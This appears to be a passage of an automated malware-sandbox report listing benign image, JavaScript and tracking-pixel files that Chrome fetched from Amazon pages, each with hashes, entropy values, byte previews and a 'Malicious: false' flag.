                                                                                                                                                                                                        Preview:/*. jQuery JavaScript Library v1.6.4. http://jquery.com/.. Copyright 2011, John Resig. Dual licensed under the MIT or GPL Version 2 licenses.. http://jquery.org/license.. Includes Sizzle.js. http://sizzlejs.com/. Copyright 2011, The Dojo Foundation. Released under the MIT, BSD, and GPL Licenses... Amazon elects to use jQuery and Sizzle under the MIT license... Date: Mon Sep 12 18:54:48 2011 -0400. Sizzle CSS Selector Engine. Copyright 2011, The Dojo Foundation. Released under the MIT, BSD, and GPL Licenses.. More information: http://sizzlejs.com/.*/.(function(H){var r=window.AmazonUIPageJS||window.P,p=r._namespace||r.attributeErrors,J=p?p("AmazonUIjQuery","AmazonUI"):r;J.guardFatal?J.guardFatal(H)(J,window):J.execute(function(){H(J,window)})})(function(H,r,p){r.navigator&&r.navigator.userAgent&&H.declare("jQuery",function(){function J(a,b,d){if(d===p&&1===a.nodeType)if(d="data-"+b.replace(gb,"-$1").toLowerCase(),d=a.getAttribute(d),"string"===typeof d){try{d="true"===d?!0:"false"===
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11483
                                                                                                                                                                                                        Entropy (8bit):7.822734923261984
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:fJHC+Xf28JSIr+2zn3EPTUY2BYVKBcyUT2XvTq3+vORNILR5/mazOa:f88OXK+2zUPmyyBXW3+GRNWf/map
                                                                                                                                                                                                        MD5:89F0804DFFBD843C79E6ABD69E440CA2
                                                                                                                                                                                                        SHA1:23703A46D1422240E7F9221FC4ED3189603B4A7E
                                                                                                                                                                                                        SHA-256:72C208D0516125DAD284B8D649812A31023424B6B1C256CD8FB5EB4253A591FC
                                                                                                                                                                                                        SHA-512:77EE72A317D6D7675D537BADFE7C503654CC71B042585CC2D1525B31D2959033FDD1D3211AD1BDEF3623140259DCC2DAD8EC23895C9ECCE221073D7118FC6C4B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3...................................................................................!...............l.X.@{.....................6.F?........X|......h..o%.....................,.j..CY.eX...=.2..A.{yR`...S.N.:#..........................MCKY.n...m..C_...5...+.~..........[.;>.K0.@...............Y..i.:gth.H...8.nQ.s..q..YY.i......z&y}.....k..................a....Z?yh.g.|3I.K...s.-{.OW......4w\...,.5,..?.O...X................k...F.{.D..QM..*l>.m..tng.Wj?/O3u.V..&t..D.u}...h.................p..t...F....u.oN~MGe.Z.3V.4.}........$.H>p}%...................!....s.As...<.....\..O(......1^..bI.......:................\p....9..@. F...Y..d..I.4Y'...J.jD...................tn...X...R.O..n.k%.zL.'d.I.n}$......................~..#....=e@.X.J.zz.wc..?.e..2.I>l.(.......A..f..8...........U..pn...|=!.....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, progressive, precision 8, 1500x600, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):78371
                                                                                                                                                                                                        Entropy (8bit):7.869737476204653
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:4KSbNUo9i2YasYUnhQKX6E8fywYoslVX9hfYpKkfuf6BQ+BUAx:4TNUOi/ZYehaqoslJ9SpLuB6UAx
                                                                                                                                                                                                        MD5:D8EDDD493680E5EF02A9C7A6446C6EA2
                                                                                                                                                                                                        SHA1:8C18C554EA7DF8BC3F5F2E7A63CD4C032B6D4492
                                                                                                                                                                                                        SHA-256:E43B4D4AA387E5B0B3DA1AF92E5E7B336FD9B31D15C3FB93D3D2757862ECFEB0
                                                                                                                                                                                                        SHA-512:7B1D8AAE46D8B46526C67E1C3A9988D94B90C8C7DD4AA447289570E887AA9E36CBC34EA9697983C79597FB047EE536583B292B240020AD946F6AAEF673BC976D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 440 x 440, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):40440
                                                                                                                                                                                                        Entropy (8bit):7.984929685013096
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:fXuYQ6SS2oxdbXvZTgCXwCxkwf3iXZzCOdcqgk9HrLdEcWtQ6FKK0r7q:PuGSS2udTXwBwv++Vk9LLAxFKvre
                                                                                                                                                                                                        MD5:3082D8D0886ED64BB5C79123EC89D518
                                                                                                                                                                                                        SHA1:A1A6E73C093696F1AB1293B6DA0906C1A512AF99
                                                                                                                                                                                                        SHA-256:1D3B16A1BACA920A480242C3E2ACA3AB200EBBBD97FFA66272759C4B795D1B0A
                                                                                                                                                                                                        SHA-512:17A4A7559506B7209703C4F3813D3D48825D05DE2F41942BAA39050A35F97788093C33BE41A83C0FCE362D8FE79DC0767A4F0355D133076CC0318216FB8DFC0D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR.....................PLTE..T........Q.....R.....U.....S...........P..O..V..N.....M....................L.........".=#/>.....V...(4B.....Y...%1@....................%..M....5.........*...../................3.........Q.............(7.#3.....T................*:....)..............A........*.....,..............+..@.....*..9.hpy......1.........O.6......P...;ER....^0<J..R..`......\ep..............Q..K.....Q.....]&L.....,..............Ue......"..............!.........?...../..6.....Vx.....8_..+.......E+.+6E..rvx......Qp.w...*..Q...B..Y...NV_[3............8....H..-.........&"......DN[...8!.......7X...n........}T]g.......F...V..g..~.{.....i...D=7.|6....y..1Oi...AQu.......x?.81*.f!.:.fhd...N.....!@....g..8.......Ki.........PNJeE#.n6.......".xTx^B.J%.....H..Y.[..s..@.{;H`....f~A.. .IDATx..=..Y..u...u%..U......&......h.....@AO..,.<4.q.`..M....$...v...L4..=..T...v0.{.....m..{.{...G..<....>...?>..}.N......p.#..?.....k.h0..d....aZ.f...W...1.....Z7e.PU
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:XRRBVETR66S3T97BM5KF$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295223.0%26id%3DXRRBVETR66S3T97BM5KF%26sc0%3Daui%3Asw%3Actrl_changed%26bb0%3D1258%26pc0%3D32263%26ld0%3D32263%26t0%3D1723729107574%26sc1%3Daui%3Asw%3Appft%3Acallback_ricb%26bb1%3D1258%26pc1%3D1835%26ld1%3D1835%26t1%3D1723729077146%26sc2%3Dportal-bb%26pc2%3D39%26ld2%3D39%26t2%3D1723729076628%26sc3%3DheroAf%26cf3%3D1434%26pc3%3D1434%26ld3%3D1434%26t3%3D1723729076745%26sc4%3Dh1Af%26cf4%3D1435%26pc4%3D1435%26ld4%3D1435%26t4%3D1723729076746%26sc5%3DnavCF%26cf5%3D1536%26pc5%3D1536%26ld5%3D1539%26t5%3D1723729076850%26sc6%3DcsmCELLSframework%26bb6%3D1685%26pc6%3D1685%26ld6%3D1685%26t6%3D1723729076996%26sc7%3DcsmCELLSpdm%26bb7%3D1685%26pc7%3D1712%26ld7%3D1712%26t7%3D1723729077023%26sc8%3DcsmCELLSvpm%26bb8%3D1712%26pc8%3D1712%26ld8%3D1712%26t8%3D1723729077023%26sc9%3DcsmCELLSfem%26bb9%3D1712%26pc9%3D1712%26ld9%3D1712%26t9%3D1723729077023%26sc10%3Due_sushi_v1%26bb10%3D1713%26pc10%3D1713%26ld10%3D1713%26t10%3D1723729077024%26sc11%3Ddesktop-grid-2-visible%26cf11%3D2888%26pc11%3D2888%26ld11%3D2888%26t11%3D1723729078199%26sc12%3Dgw-ftGr-desktop-hero-1-visible%26cf12%3D2894%26pc12%3D2894%26ld12%3D2894%26t12%3D1723729078205%26sc13%3Ddesktop-grid-4-visible%26cf13%3D2894%26pc13%3D2894%26ld13%3D2894%26t13%3D1723729078205%26sc14%3Ddesktop-grid-3-visible%26cf14%3D2901%26pc14%3D2901%26ld14%3D2901%26t14%3D1723729078212%26sc15%3Ddesktop-grid-1-visible%26cf15%3D4047%26pc15%3D4047%26ld15%3D4047%26t15%3D1723729079358%26sc16%3Ddesktop-grid-5-visible%26cf16%3D5445%26pc16%3D5445%26ld16%3D5445%26t16%3D1723729080756%26sc17%3Ddesktop-grid-6-visible%26cf17%3D5487%26pc17%3D5487%26ld17%3D5487%26t17%3D1723729080798%26sc18%3Ddesktop-grid-7-visible%26cf18%3D7314%26pc18%3D7314%26ld18%3D7314%26t18%3D1723729082625%26sc19%3Ddesktop-grid-8-visible%26cf19%3D7938%26pc19%3D7939%26ld19%3D7939%26t19%3D1723729083250%26sc20%3DspLoadJs%26cf20%3D7940%26pc20%3D7940%26ld20%3D7940%26t20%3D1723729083251%26sc21%3Ddesktop-1-visible%26cf21%3D10220%26pc21%3D10220%26ld21%3D10220%26t21%3D1723729085531%26sc22%3Ddesktop-btf-grid-1-visible%26cf22%3D10221%26pc22%3D10221%26ld22%3D10221%26t22%3D1723729085532%26sc23%3Ddesktop-btf-grid-2-visible%26cf23%3D10221%26pc23%3D10221%26ld23%3D10221%26t23%3D1723729085532%26sc24%3Ddesktop-btf-grid-3-visible%26cf24%3D12602%26pc24%3D12602%26ld24%3D12602%26t24%3D1723729087913%26sc25%3Ddesktop-btf-grid-4-visible%26cf25%3D12603%26pc25%3D12603%26ld25%3D12603%26t25%3D1723729087914%26sc26%3Ddesktop-3-visible%26cf26%3D15926%26pc26%3D15926%26ld26%3D15926%26t26%3D1723729091237%26sc27%3Ddesktop-btf-grid-5-visible%26cf27%3D15927%26pc27%3D15927%26ld27%3D15927%26t27%3D1723729091238%26sc28%3Ddesktop-btf-grid-6-visible%26cf28%3D15993%26pc28%3D15993%26ld28%3D15993%26t28%3D1723729091304%26sc29%3Ddesktop-btf-grid-7-visible%26cf29%3D16063%26pc29%3D16063%26ld29%3D16063%26t29%3D1723729091374%26sc30%3Ddesktop-4-visible%26cf30%3D16271%26pc30%3D16271%26ld30%3D16271%26t30%3D1723729091582%26sc31%3Ddesktop-btf-grid-8-visible%26cf31%3D16582%26pc31%3D16582%26ld31%3D16582%26t31%3D1723729091893%26sc32%3Ddesktop-5-visible%26cf32%3D17644%26pc32%3D17644%26ld32%3D17644%26t32%3D1723729092955%26sc33%3Dgateway-asset-load%26cf33%3D17645%26pc33%3D17645%26ld33%3D17645%26t33%3D1723729092956%26sc34%3Dhero-first-image%26cf34%3D17647%26pc34%3D17647%26ld34%3D17647%26t34%3D1723729092958%26sc35%3DjQueryReady%26cf35%3D17891%26pc35%3D17891%26ld35%3D17891%26t35%3D1723729093202%26sc36%3DgwGridInit%26cf36%3D17894%26pc36%3D17894%26ld36%3D17894%26t36%3D1723729093205%26sc37%3DgwBTFGridInit%26cf37%3D17899%26pc37%3D17899%26ld37%3D17899%26t37%3D1723729093210%26sc38%3Ddesktop-6-visible%26cf38%3D17931%26pc38%3D17931%26ld38%3D17931%26t38%3D1723729093242%26sc39%3Ddesktop-btf-grid-9-visible%26cf39%3D18110%26pc39%3D18110%26ld39%3D18110%26t39%3D1723729093421%26sc40%3Ddesktop-btf-grid-10-visible%26cf40%3D18138%26pc40%3D18138%26ld40%3D18139%26t40%3D1723729093450%26sc41%3Ddesktop-btf-grid-11-visible%26cf41%3D18703%26pc41%3D18703%26ld41%3D18703%26t41%3D1723729094014%26sc42%3Ddesktop-btf-grid-12-visible%26cf42%3D18719%26pc42%3D18719%26ld42%3D18719%26t42%3D1723729094030%26sc43%3Ddesktop-7-visible%26cf43%3D19493%26pc43%3D19493%26ld43%3D19493%26t43%3D1723729094804%26sc44%3DgwLayoutReady%26cf44%3D21364%26pc44%3D21364%26ld44%3D21364%26t44%3D1723729096675%26sc45%3DgwAUIReady%26cf45%3D21367%26pc45%3D21368%26ld45%3D21368%26t45%3D1723729096679%26sc46%3Ddesktop-3-active%26cf46%3D21534%26pc46%3D21534%26ld46%3D21534%26t46%3D1723729096845%26sc47%3Ddesktop-4-active%26cf47%3D21534%26pc47%3D21534%26ld47%3D21534%26t47%3D1723729096845%26sc48%3Ddesktop-6-active%26cf48%3D21534%26pc48%3D21534%26ld48%3D21534%26t48%3D1723729096845%26sc49%3Ddesktop-7-active%26cf49%3D21534%26pc49%3D21534%26ld49%3D21535%26t49%3D1723729096846%26sc50%3Dgw-hero-btf-populate%26cf50%3D21896%26pc50%3D21896%26ld50%3D21896%26t50%3D1723729097207%26sc51%3DgwHerotatorActive%26cf51%3D22874%26pc51%3D22874%26ld51%3D22874%26t51%3D1723729098185%26sc52%3Dgw-ftGr-desktop-hero-6-visible%26cf52%3D25569%26pc52%3D25569%26ld52%3D25569%26t52%3D1723729100880%26sc53%3Dgw-ftGr-desktop-hero-2-visible%26cf53%3D49611%26pc53%3D49611%26ld53%3D49611%26t53%3D1723729124922%26sc54%3Dgw-ftGr-desktop-hero-5-visible%26cf54%3D51171%26pc54%3D51171%26ld54%3D51171%26t54%3D1723729126482%26sc55%3Dgw-ftGr-desktop-hero-3-visible%26cf55%3D51171%26pc55%3D51171%26ld55%3D51171%26t55%3D1723729126482%26sc56%3Dgw-ftGr-desktop-hero-4-visible%26cf56%3D51176%26pc56%3D51176%26ld56%3D51176%26t56%3D1723729126487%26sc57%3Dgw-ftGr-desktop-hero-7-visible%26cf57%3D52322%26pc57%3D52322%26ld57%3D52322%26t57%3D1723729127633%26sc58%3Dgw-ftGr-desktop-hero-8-visible%26cf58%3D52431%26pc58%3D52431%26ld58%3D52431%26t58%3D1723729127742%26ctb%3D1:61628
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2367
                                                                                                                                                                                                        Entropy (8bit):7.79920095650301
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r3O7yKty0rsQGvhXcAOnUiikjSQuEsEEywh5xm+U13/MZIZ1aS7z3Ac:TTyKtSvhXmnlipPGE5ZU1ko1aS7z3l
                                                                                                                                                                                                        MD5:BE4848BC550706C1058C5B75498727E9
                                                                                                                                                                                                        SHA1:7429B4D17CD7528AE270B0985F3F06D1719FB514
                                                                                                                                                                                                        SHA-256:42EF438FE7B56D80FE47BBFDEB146A7C54F32C124B5BB33E75EAE71BBCA68232
                                                                                                                                                                                                        SHA-512:152990672766BBAF4B0BECCB9CB1394FAE7D22F7C2CEADF6930F93853D948ADA70590824ACE317F3DAA93CE7ACDAD56DE3DD974662858D69C2B87D4610312D01
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!..1"AQ...TU..26Rab...#3BEqsc....................................................!Q1...2"#A3............?...") ""...." ...""...." ..."".....8X_#........J...-.1g.pJ.R6#3.......f..au.z.g..:.e..Q. .2.*..W..jgy...V..w..mq:..vZh...j!.O0_=lR{4.`.\N.....K...f..d..x.O.H..8M.'Cs..n".$...JO..3..'.7.Si....>..../..N....[.I..1.45.8&k.#.........Ls...YH..m...........q..KQ.~.hg..`.;./........+.....`...y...II.>B.I.6.7..9..it.b7,...6.T......5.:_.js..D....{...!....v...|...B.H.;d.).}.....]q.+.J!.f..7S.J.\n)b...9.I!`R./)....O+..K.u....3.-s!...P...a..I......\|$...MU.1/......b/../...i...............y.U&w.."".N....Q...k-..gRG~.N.....uR.D......|@.m.}.....3.W*.8XG:G9..Lo.{L..{....1.V.u.i2K......h.e.......D.".r+.=.T....H....M..../.Y.F.].y..D...C.uNj.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1164)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):92622
                                                                                                                                                                                                        Entropy (8bit):5.499495828086525
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:itJNHcVgncVumON9qk+qC/qgKqJzqdG2utZO:4Hc+VN4kPCig7JWdG2F
                                                                                                                                                                                                        MD5:BE2B85095796B889952BB0E9D47D8C6D
                                                                                                                                                                                                        SHA1:E5A8312BD96A8CB015173BEFD135D2AC90FA931A
                                                                                                                                                                                                        SHA-256:0AF70BB1962F3DF64FA9EFBBEFC1DD9B3D4B41B75147A3C424EE6764F37A501B
                                                                                                                                                                                                        SHA-512:B1569B108FDF10CE71FB2517EB3A76089CA204FCD20CD46F8EF842D9B3F1F358007D890A8A7BFD497CEA65568AB6163D8198E5D5D837840F022C73EDFA84CFE1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(function(t){var h=window.AmazonUIPageJS||window.P,k=h._namespace||h.attributeErrors,M=k?k("SocialShareWidgetAUI","AmazonUI"):h;M.guardFatal?M.guardFatal(t)(M,window):M.execute(function(){t(M,window)})})(function(t,h,k){function M(e){if(Array.isArray(e)){for(var k=0,h=Array(e.length);k<e.length;k++)h[k]=e[k];return h}return Array.from(e)}"use strict";"use strict";t.register("SocialShareWidget",function(){var e;(function(){var k={353:function(e,a,n){Object.defineProperty(a,"__esModule",{value:!0});.var c=n(905),b=n(738);e=function(){function a(){var c=this;this.generateTimestampCollection=function(){var a=(new Date).getTimezoneOffset();a=c.getDateTimeByOffset(a);var d=c.getDateTimeByOffset(0);return{hitDay:a.split("T")[0],hitDatetime:a,hitDatetimeUtc:d}};this.getMarketplaceId=function(a){return"string"==typeof a?a:h.ue&&h.ue.mid?h.ue.mid:b.CSA_DEFAULT_VALUE.string};var d=this.generateTimestampCollection();this.csaMetricsData={schemaId:a.CSA_SCHEMA_ID,userAgentId:b.CSA_DEFAULT_VALUE.numb
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:0RPFFN4XC9JAK0QN8ZQ4$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D0RPFFN4XC9JAK0QN8ZQ4%26ic%3D2%26m%3D1%26sc%3Dcsa%3Avl90%26vl90%3D417%26pc%3D5150%26at%3D5150%26t%3D1723729121679%26pty%3DFullPageAuthentication%26spty%3Dclaim%26pti%3Dundefined%26tid%3D0RPFFN4XC9JAK0QN8ZQ4%26aftb%3D1%26lob%3D1:5149
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):68782
                                                                                                                                                                                                        Entropy (8bit):7.976825743641747
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:rIZGY8i4nqkvDYubQwqNAUnF5CQLPqIPl9IAXkK4zwxZ62Y:rhuoXbYcdc3FbjqIt9F4zwj6F
                                                                                                                                                                                                        MD5:D4F855A97CE69E0B4359AB927EC28574
                                                                                                                                                                                                        SHA1:6FE0487FA6ADBCAEDF60DBFB8086C001C0292307
                                                                                                                                                                                                        SHA-256:19B9598112754CE0A2612686ABC08BA18981C528FC3189C6AAAB4087ADB855E6
                                                                                                                                                                                                        SHA-512:9E9775C21FBBD3F119569B94416DB3809CE68FB39726A514FE87560F7034EBECFE7019DBA6E920DAB8602F1022E65D77CD6F7B7570C62E5FA846A45E27FECA75
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986217_UAE_Budget_Store_AE_xsite_bubbler_HPC_en_400x400_2X._CB644457597_.jpg
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................................;.................................................................................`..0...@.YoQ......q....|~./?.Z.~u.....d..w\................<9a...c.^..69....d.........Fj..(u.a...............o....vEhc.zN.........v.....LK.'.\i@...........m...@.!.............X.L...JYi.._.........k...y.+1............/.mw<}&.}.`c ......G...w...............9K.....)..7......."......H....@..........~..2'.p...<.........-.a.......5.....V.......|..;....c.W=.....e7#....4.....@.."..........3'u'...!..D..%6..........b.(.0'Tv....;E...<...~.....n......|...~.t..;.........&...9..64..1oqm%.............O.M"d...t.....L..<...}....d.......h.=.*..<...>....$..c~...+....{~#......=...8N.R......K...........!u..._!.~.x.......#&.0...O.q....j......<.?.]...^.....a........l..1.w...Kj./.L..WO).... <..............f>..oowX......".O...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 289x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):9636
                                                                                                                                                                                                        Entropy (8bit):7.933638192088915
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:9oL5Auc5GZZQuzQiMer+v/FOPxTOFTt33NUZMAYL74:9oFA75Tu0GrmFWxallq1Yv4
                                                                                                                                                                                                        MD5:58B531447554FBE79B17638EFCEA7679
                                                                                                                                                                                                        SHA1:38175A8C1A291E85CA1FFB212D5260C4C28595BB
                                                                                                                                                                                                        SHA-256:D8CA907E7E5C312946E43BB42A4FFB26679F68971AB16F102D54FD90A477D0D1
                                                                                                                                                                                                        SHA-512:0A294388D5D87F252CBD9BC4B7FBF1A2065ADC031EB2068E8A2AA675DD7930B463FB09D77970BE96B3614C59A6FA8195B08B7B0A6005AD88E8A151BC8C9F2FC9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........!.."..........2..............................................................._9.q.........f..M.#..4.%].O.ei..G...4....i..L#..0.d.";..H.i..:.G.....P.U...d...S|.y!.)IB1.Hw..XK.HN>....h.!q}-K.R......\.>..F.9..]X..X.Re..K.!4...`.%..|..,..raHt.R.&..I..R\".e..K0..._,(..JM....GuWlU........r#.a...V.Lj...E.E..p...p.Ph..U.U.[Y.}*....r..X+..U.Q.Ff..v..E.......s..<..p.wu8C..S......s.. ."9.c..*v..j."} ......=Uk.zvW?...[.=...G.n(^....p....;.<...r..p....1.d.Y.=...^....Z.F9.1.1...-.:}....0.*.D...cUpW....x.G...t...W.y..wN..d............f.}.=.^.5s\....c...Y,..A.,.>y./4..d.*/v.G.} .._......N.+...f.v.m.jg..*6.)r7o[>/....1G0....=.X-......<.D.<....9.,f..z_.}.=...pU..+ .M.B...K/.K=>.aH...|=C.k......n.V..@.. .....G........^.IX.c".G(...b.k............s.r....r .4|...?.9.O=..7.9WZ.Q2..fq....~%!.....i....h8b.V...<h
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 240 x 735, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):6829
                                                                                                                                                                                                        Entropy (8bit):7.762659774988712
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:Y6JdU2FlfkTCpJxR0P10gvhbeNs359AZGcF80PnVmohveKKlNGsD6pqGZ7Afb3F:FjkTCxO0gvhsLBp1hm70pRZSp
                                                                                                                                                                                                        MD5:13FD5F8C8447783E11D8B9717A38CF2F
                                                                                                                                                                                                        SHA1:553793E4D98E5A3C349047B9D9097EECF5D799D9
                                                                                                                                                                                                        SHA-256:9B280F263A12EC4C9B718DCA074F908493A05A81EB5F9D29023949E33EBD3152
                                                                                                                                                                                                        SHA-512:E06A02652E492FFEED3BA4D324C2DC16475FCCE4A884472B5FD28D0BAE4AA5434BDB06536E7827360ECED8AD82A193B5E78FB8FABFCE8F6BCE86A36C57187FE8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/S/sash/vfqcwUkuArEiwD2.png
                                                                                                                                                                                                        Preview:.PNG........IHDR.............h.j....PLTE....../8B..................EIRtw~{~.8=G7<F;@J>CMAFP...:?H<AJ?DM@ENCHQBGPFKT5;EDIQFKSEJRQV^6<E8>GOWctx~sw}......CKVJR]:@H<BJ=CK@FN`el}.....:DP6?JEP]6>H9AK;CMCKUBJTnw.t|......................09C1:D>IU3<F?JV9CN4=G5>H>HSDNYDMW=EN?GPAIRBJSDLUXbmGOXHPYkt~eltx..qw~AMY6@J7@IIT_;DM=FOMWaHQZ\fpU]eu{..............................................CMVcmv...ry...................................................#..&..(..*..+..-.....0..3..4..6..9..=..>.<..@..C..@..D..G..H.D..K..O..R..M..V..T..g..n..p..r..r..t..u..v..x...................................&..2..=..L..U..\..c..m..x...............................................................................................................................{{{tttkkkeeeZZZRRRKKKFFF@@@<<<666333***$$$.....................`.FB....tRNS...................................................................................................................................................................................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 226x226, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):6685
                                                                                                                                                                                                        Entropy (8bit):7.875493204428111
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:aGAwLw6+VJevplpDQlVtFZjXbIXT+N7mB:x/+V6DefXbIXTeE
                                                                                                                                                                                                        MD5:747BDF037BF8934D668D6676748734C4
                                                                                                                                                                                                        SHA1:E0945312571FE6950548130CAE0B4D8274C472A8
                                                                                                                                                                                                        SHA-256:E828A47BFF8F40A8F95BC80BD87ACE06EB4B31CB4CF9F975E9CC0885C01E329A
